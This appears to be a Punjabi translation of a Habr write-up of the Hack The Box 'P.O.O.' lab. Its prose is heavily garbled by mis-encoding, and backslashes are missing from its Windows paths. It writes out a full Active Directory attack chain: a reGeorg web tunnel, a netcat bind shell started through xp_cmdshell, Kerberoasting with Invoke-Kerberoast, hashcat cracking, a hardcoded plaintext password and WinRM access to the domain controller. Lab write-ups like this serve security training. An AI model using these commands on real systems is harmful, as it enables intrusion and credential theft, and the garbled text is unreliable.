เจคเฉ p00_adm เจเจชเจญเฉเจเจคเจพเจตเจพเจ เจฆเจพ SPN เจฎเจฟเจฒเจฆเจพ เจนเฉ, เจเจฟเจธเจฆเจพ เจฎเจคเจฒเจฌ เจนเฉ เจเจฟ เจเจน เจเจฐเจฌเจฐเฉเจธเจเจฟเฉฐเจ เจตเจฐเจเฉ เจนเจฎเจฒเฉ เจฒเจ เจเจฎเจเจผเฉเจฐ เจนเจจเฅค เจธเฉฐเจเฉเจช เจตเจฟเฉฑเจ, เจ
เจธเฉเจ เจเจนเจจเจพเจ เจฆเฉ เจชเจพเจธเจตเจฐเจก เจฆเฉ เจนเฉเจธเจผ เจชเฉเจฐเจพเจชเจค เจเจฐ เจธเจเจฆเฉ เจนเจพเจเฅค
เจชเจนเจฟเจฒเจพเจ เจคเฉเจนเจพเจจเฉเฉฐ MSSQL เจเจชเจญเฉเจเจคเจพ เจฆเฉ เจคเจฐเจซเฉเจ เจเฉฑเจ เจธเจฅเจฟเจฐ เจธเจผเฉเฉฑเจฒ เจชเฉเจฐเจพเจชเจค เจเจฐเจจ เจฆเฉ เจฒเฉเฉ เจนเฉเฅค เจชเจฐ เจเจฟเจเจเจเจฟ เจ
เจธเฉเจ เจชเจนเฉเฉฐเจ เจตเจฟเฉฑเจ เจธเฉเจฎเจค เจนเจพเจ, เจธเจพเจกเฉ เจเฉเจฒ เจธเจฟเจฐเจซเจผ 80 เจ
เจคเฉ 1433 เจชเฉเจฐเจเจพเจ เจฐเจพเจนเฉเจ เจนเฉเจธเจ เจจเจพเจฒ เจธเฉฐเจชเจฐเจ เจนเฉเฅค เจชเจฐ เจชเฉเจฐเจ 80 เจฆเฉเจเจฐเจพ เจเจตเจพเจเจพเจ เจจเฉเฉฐ เจธเฉเจฐเฉฐเจ เจเจฐเจจเจพ เจธเฉฐเจญเจต เจนเฉ! เจเจธเจฆเฉ เจฒเจ เจ
เจธเฉเจ เจตเจฐเจคเจพเจเจเฉ
เจชเจฐ เจเจฆเฉเจ เจ
เจธเฉเจ เจเจธเจจเฉเฉฐ เจเจเจธเฉเจธ เจเจฐเจจ เจฆเฉ เจเฉเจธเจผเจฟเจธเจผ เจเจฐเจฆเฉ เจนเจพเจ, เจธเจพเจจเฉเฉฐ เจเฉฑเจ 404 เจเจฒเจคเฉ เจฎเจฟเจฒเจฆเฉ เจนเฉเฅค เจเจธเจฆเจพ เจฎเจคเจฒเจฌ เจนเฉ เจเจฟ *.aspx เจซเจพเจเจฒเจพเจ เจจเฉเฉฐ เจเจฒเจพเจเจ เจจเจนเฉเจ เจเจพเจเจฆเจพ เจนเฉเฅค เจเจนเจจเจพเจ เจเจเจธเจเฉเจเจธเจผเจจเจพเจ เจจเจพเจฒ เจซเจพเจเจฒเจพเจ เจจเฉเฉฐ เจเจฒเจพเจเจฃ เจฒเจ, ASP.NET 4.5 เจจเฉเฉฐ เจนเฉเจ เจพเจ เจฆเจฟเฉฑเจคเฉ เจ
เจจเฉเจธเจพเจฐ เจธเจฅเจพเจชเจฟเจค เจเจฐเฉเฅค
dism /online /enable-feature /all /featurename:IIS-ASPNET45
เจ
เจคเฉ เจนเฉเจฃ, tunnel.aspx เจจเฉเฉฐ เจเจเจธเฉเจธ เจเจฐเจจ เจตเฉเจฒเฉ, เจธเจพเจจเฉเฉฐ เจเจตเจพเจฌ เจฎเจฟเจฒเจฆเจพ เจนเฉ เจเจฟ เจธเจญ เจเฉเจ เจเจพเจฃ เจฒเจ เจคเจฟเจเจฐ เจนเฉเฅค
เจเจ เจเจชเจฒเฉเจเฉเจธเจผเจจ เจฆเจพ เจเจฒเจพเจเฉฐเจ เจนเจฟเฉฑเจธเจพ เจธเจผเฉเจฐเฉ เจเจฐเฉเจ, เจเฉ เจเฉเจฐเฉเจซเจฟเจ เจจเฉเฉฐ เจฐเฉเจฒเฉเจ
เจเจฐเฉเจเจพเฅค เจ
เจธเฉเจ เจชเฉเจฐเจ 5432 เจคเฉเจ เจธเจพเจฐเฉ เจเฉเจฐเฉเจซเจฟเจ เจจเฉเฉฐ เจธเจฐเจตเจฐ 'เจคเฉ เจญเฉเจเจพเจเจเฉเฅค
python ./reGeorgSocksProxy.py -p 5432 -u http://poo.htb/tunnel.aspx
เจ
เจคเฉ เจ
เจธเฉเจ เจเจชเจฃเฉ เจชเฉเจฐเฉเจเจธเฉ เจฐเจพเจนเฉเจ เจเจฟเจธเฉ เจตเฉ เจเจชเจฒเฉเจเฉเจธเจผเจจ เจฆเฉ เจเฉเจฐเฉเจซเจฟเจ เจจเฉเฉฐ เจญเฉเจเจฃ เจฒเจ เจชเฉเจฐเฉเจเจธเฉเจเฉเจจ เจฆเฉ เจตเจฐเจคเฉเจ เจเจฐเจฆเฉ เจนเจพเจเฅค เจเจ เจเจธ เจชเฉเจฐเฉเจเจธเฉ เจจเฉเฉฐ /etc/proxychains.conf เจธเฉฐเจฐเจเจจเจพ เจซเจพเจเจฒ เจตเจฟเฉฑเจ เจเฉเฉเฉเจเฅค
เจเจ เจนเฉเจฃ เจชเฉเจฐเฉเจเจฐเจพเจฎ เจจเฉเฉฐ เจธเจฐเจตเจฐ เจคเฉ เจ
เจชเจฒเฉเจก เจเจฐเฉเจ
เจนเฉเจฃ, MSSQL เจฐเจพเจนเฉเจ, เจ
เจธเฉเจ เจฒเจฟเจธเจจเจฐ เจจเฉเฉฐ เจฒเจพเจเจ เจเจฐเจฆเฉ เจนเจพเจเฅค
xp_cmdshell C:tempnc64.exe -e powershell.exe -lvp 4321
เจ
เจคเฉ เจ
เจธเฉเจ เจเจชเจฃเฉ เจชเฉเจฐเฉเจเจธเฉ เจฐเจพเจนเฉเจ เจเฉเฉเจฆเฉ เจนเจพเจเฅค
proxychains rlwrap nc poo.htb 4321
เจ
เจคเฉ เจเจ เจนเฉเจธเจผ เจชเฉเจฐเจพเจชเจค เจเจฐเฉเจ.
. .Invoke-Kerberoast.ps1
Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat | Select-Object Hash | Out-File -filepath 'C:tempkerb_hashes.txt' -Width 8000
type kerb_hashes.txt
เจ
เฉฑเจเฉ, เจคเฉเจนเจพเจจเฉเฉฐ เจเจนเจจเจพเจ เจนเฉเจธเจผเจพเจ เจเฉฑเจคเฉ เจฆเฉเจนเจฐเจพเจเจฃ เจฆเฉ เจฒเฉเฉ เจนเฉเฅค เจเจฟเจเจเจเจฟ rockyou เจเฉเจฒ เจชเจพเจธเจตเจฐเจก เจกเฉเจเจพ เจกเจฟเจเจธเจผเจจเจฐเฉ เจจเจนเฉเจ เจนเฉ, เจฎเฉเจ Seclists เจตเจฟเฉฑเจ เจชเฉเจฐเจฆเจพเจจ เจเฉเจคเฉ เจธเจพเจฐเฉ เจชเจพเจธเจตเจฐเจก เจธเจผเจฌเจฆเจเฉเจธเจผเจพเจ เจฆเฉ เจตเจฐเจคเฉเจ เจเฉเจคเฉ เจนเฉเฅค เจเจฃเจจเจพ เจฒเจ เจ
เจธเฉเจ เจนเฉเจธเจผเจเฉเจ เจฆเฉ เจตเจฐเจคเฉเจ เจเจฐเจฆเฉ เจนเจพเจเฅค
hashcat -a 0 -m 13100 krb_hashes.txt /usr/share/seclists/Passwords/*.txt --force
เจ เจคเฉ เจ เจธเฉเจ เจฆเฉเจตเฉเจ เจชเจพเจธเจตเจฐเจก เจฒเฉฑเจญเจฆเฉ เจนเจพเจ, เจชเจนเจฟเจฒเจพ เจกเฉฑเจ_passwordlist.txt เจกเจฟเจเจธเจผเจจเจฐเฉ เจตเจฟเฉฑเจ, เจ เจคเฉ เจฆเฉเจเจพ Keyboard-Combinations.txt เจตเจฟเฉฑเจเฅค
เจ
เจคเฉ เจเจธ เจฒเจ เจธเจพเจกเฉ เจเฉเจฒ เจคเจฟเฉฐเจจ เจเจชเจญเฉเจเจคเจพ เจนเจจ, เจ
เจธเฉเจ เจกเฉเจฎเฉเจจ เจเฉฐเจเจฐเฉเจฒเจฐ เจคเฉ เจเจพเจเจฆเฉ เจนเจพเจ. เจชเจนเจฟเจฒเจพเจ เจเจธ เจฆเจพ เจชเจคเจพ เจฒเจเฅค
เจฌเจนเฉเจค เจตเจงเฉเจ, เจ
เจธเฉเจ เจกเฉเจฎเฉเจจ เจเฉฐเจเจฐเฉเจฒเจฐ เจฆเจพ IP เจชเจคเจพ เจธเจฟเฉฑเจเจฟเจ เจนเฉเฅค เจเจ เจกเฉเจฎเฉเจจ เจฆเฉ เจธเจพเจฐเฉ เจเจชเจญเฉเจเจคเจพเจตเจพเจ เจฆเจพ เจชเจคเจพ เจฒเจเจพเจ, เจจเจพเจฒ เจนเฉ เจเจนเจจเจพเจ เจตเจฟเฉฑเจเฉเจ เจเฉเจฃ เจเฉฑเจ เจชเฉเจฐเจธเจผเจพเจธเจ เจนเฉเฅค เจเจพเจฃเจเจพเจฐเฉ เจชเฉเจฐเจพเจชเจค เจเจฐเจจ เจฒเจ เจธเจเฉเจฐเจฟเจชเจ เจจเฉเฉฐ เจกเจพเจเจจเจฒเฉเจก เจเจฐเจจ เจฒเจ PowerView.ps1. เจซเจฟเจฐ เจ
เจธเฉเจ -s เจชเฉเจฐเจพเจฎเฉเจเจฐ เจตเจฟเฉฑเจ เจธเจเฉเจฐเจฟเจชเจ เจจเจพเจฒ เจกเจพเจเจฐเฉเจเจเจฐเฉ เจจเฉเฉฐ เจจเจฟเจฐเจงเจพเจฐเจฟเจค เจเจฐเจฆเฉ เจนเฉเจ, evil-winrm เจฆเฉ เจตเจฐเจคเฉเจ เจเจฐเจเฉ เจเฉเฉเจพเจเจเฉเฅค เจ
เจคเฉ เจซเจฟเจฐ เจชเจพเจตเจฐเจตเจฟเจ เจธเจเฉเจฐเจฟเจชเจ เจจเฉเฉฐ เจฒเฉเจก เจเจฐเฉเฅค
เจนเฉเจฃ เจธเจพเจกเฉ เจเฉเจฒ เจเจธเจฆเฉ เจธเจพเจฐเฉ เจซเฉฐเจเจธเจผเจจเจพเจ เจคเฉฑเจ เจชเจนเฉเฉฐเจ เจนเฉเฅค p00_adm เจเจชเจญเฉเจเจคเจพ เจเฉฑเจ เจตเจฟเจธเจผเฉเจธเจผ เจ
เจงเจฟเจเจพเจฐ เจชเฉเจฐเจพเจชเจค เจเจชเจญเฉเจเจคเจพ เจฆเฉ เจคเจฐเฉเจนเจพเจ เจฆเจฟเจเจฆเจพ เจนเฉ, เจเจธเจฒเจ เจ
เจธเฉเจ เจเจธเจฆเฉ เจธเฉฐเจฆเจฐเจญ เจตเจฟเฉฑเจ เจเฉฐเจฎ เจเจฐเจพเจเจเฉเฅค เจเจฒเฉ เจเจธ เจเจชเจญเฉเจเจคเจพ เจฒเจ เจเฉฑเจ PSC เจเฉเจฐเฉเจกเฉเจเจธเจผเฉเจ
เจฒ เจเจฌเจเฉเจเจ เจฌเจฃเจพเจเจเฅค
$User = 'p00_adm'
$Password = 'ZQ!5t4r'
$Cpass = ConvertTo-SecureString -AsPlainText $Password -force
$Creds = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Cpass
เจนเฉเจฃ เจธเจพเจฐเฉเจเจ เจชเจพเจตเจฐเจธเจผเฉเจฒ เจเจฎเจพเจเจกเจพเจ เจเจฟเฉฑเจฅเฉ เจ เจธเฉเจ เจเฉเจฐเฉเจกเจฟเจ เจจเจฟเจฐเจงเจพเจฐเจค เจเจฐเจฆเฉ เจนเจพเจ p00_adm เจฆเฉ เจคเจฐเจซเฉเจ เจเจฒเจพเจเจ เจเจพเจตเฉเจเจพเฅค เจเจ เจเจชเจญเฉเจเจคเจพเจตเจพเจ เจฆเฉ เจเฉฑเจ เจธเฉเจเฉ เจ เจคเฉ AdminCount เจเฉเจฃ เจชเฉเจฐเจฆเจฐเจธเจผเจฟเจค เจเจฐเฉเจเฅค
Get-NetUser -DomainController dc -Credential $Creds | select name,admincount
เจ
เจคเฉ เจเจธ เจฒเจ, เจธเจพเจกเฉ เจเจชเจญเฉเจเจคเจพ เจจเฉเฉฐ เจ
เจธเจฒ เจตเจฟเฉฑเจ เจตเจฟเจธเจผเฉเจธเจผ เจ
เจงเจฟเจเจพเจฐ เจชเฉเจฐเจพเจชเจค เจนเฉ. เจเจ เจฆเฉเจเฉเจ เจเจฟ เจเจน เจเจฟเจนเฉเฉ เจธเจฎเฉเจนเจพเจ เจจเจพเจฒ เจธเจฌเฉฐเจงเจค เจนเฉเฅค
Get-NetGroup -UserName "p00_adm" -DomainController dc -Credential $Creds
เจ
เจธเฉเจ เจ
เฉฐเจค เจตเจฟเฉฑเจ เจชเฉเจธเจผเจเฉ เจเจฐเจฆเฉ เจนเจพเจ เจเจฟ เจเจชเจญเฉเจเจคเจพ เจเฉฑเจ เจกเฉเจฎเฉเจจ เจชเฉเจฐเจธเจผเจพเจธเจ เจนเฉเฅค เจเจน เจเจธเจจเฉเฉฐ เจกเฉเจฎเฉเจจ เจเฉฐเจเจฐเฉเจฒเจฐ 'เจคเฉ เจฐเจฟเจฎเฉเจเจฒเฉ เจฒเฉเจเจเจจ เจเจฐเจจ เจฆเจพ เจ
เจงเจฟเจเจพเจฐ เจฆเจฟเฉฐเจฆเจพ เจนเฉเฅค เจเจ เจธเจพเจกเฉ เจธเฉเจฐเฉฐเจ เจฆเฉ เจตเจฐเจคเฉเจ เจเจฐเจเฉ WinRM เจจเจพเจฒ เจฒเฉเจเจเจจ เจเจฐเจจ เจฆเฉ เจเฉเจธเจผเจฟเจธเจผ เจเจฐเฉเจเฅค เจฎเฉเจ เจฌเฉเจฐเจพเจ-เจตเจฟเจจเจฐเจฎ เจฆเฉ เจตเจฐเจคเฉเจ เจเจฐเจฆเฉ เจธเจฎเฉเจ reGeorg เจฆเฉเจเจฐเจพ เจเจพเจฐเฉ เจเฉเจคเฉเจเจ เจเจฒเจคเฉเจเจ เจฆเฉเจเจฐเจพ เจเจฒเจเจฃ เจตเจฟเฉฑเจ เจธเฉเฅค
เจซเจฟเจฐ เจ
เจธเฉเจ เจเฉฑเจ เจนเฉเจฐ, เจเจธเจพเจจ เจตเจฐเจคเจฆเฉ เจนเจพเจ,
เจ
เจธเฉเจ เจเฉเฉเจจ เจฆเฉ เจเฉเจธเจผเจฟเจธเจผ เจเจฐเจฆเฉ เจนเจพเจ, เจ
เจคเฉ เจ
เจธเฉเจ เจธเจฟเจธเจเจฎ เจตเจฟเฉฑเจ เจนเจพเจ.
เจชเจฐ เจเฉเจ เจเฉฐเจกเจพ เจจเจนเฉเจ เจนเฉเฅค เจซเจฟเจฐ เจเจชเจญเฉเจเจคเจพ เจจเฉเฉฐ เจฆเฉเจเฉ เจ
เจคเฉ เจกเฉเจธเจเจเจพเจชเจพเจ เจฆเฉ เจเจพเจเจ เจเจฐเฉ.
mr3ks 'เจคเฉ เจธเจพเจจเฉเฉฐ เจเฉฐเจกเจพ เจฎเจฟเจฒเจฆเจพ เจนเฉ เจ
เจคเฉ เจชเฉเจฐเจฏเฉเจเจธเจผเจพเจฒเจพ 100% เจฎเฉเจเฉฐเจฎเจฒ เจนเฉ เจเจ เจนเฉเฅค
เจเจน เจธเจญ เจนเฉ. เจซเฉเจกเจฌเฉเจ เจตเจเฉเจ, เจเจฟเฉฑเจชเจฃเฉ เจเจฐเฉ เจเจฟ เจเฉ เจคเฉเจธเฉเจ เจเจธ เจฒเฉเจ เจคเฉเจ เจเฉเจ เจจเจตเจพเจ เจธเจฟเฉฑเจเจฟเจ เจนเฉ เจ
เจคเฉ เจเฉ เจเจน เจคเฉเจนเจพเจกเฉ เจฒเจ เจฒเจพเจญเจฆเจพเจเจ เจธเฉเฅค
'เจคเฉ เจคเฉเจธเฉเจ เจธเจพเจกเฉ เจจเจพเจฒ เจเฉเฉ เจธเจเจฆเฉ เจนเฉ
เจธเจฐเฉเจค: www.habr.com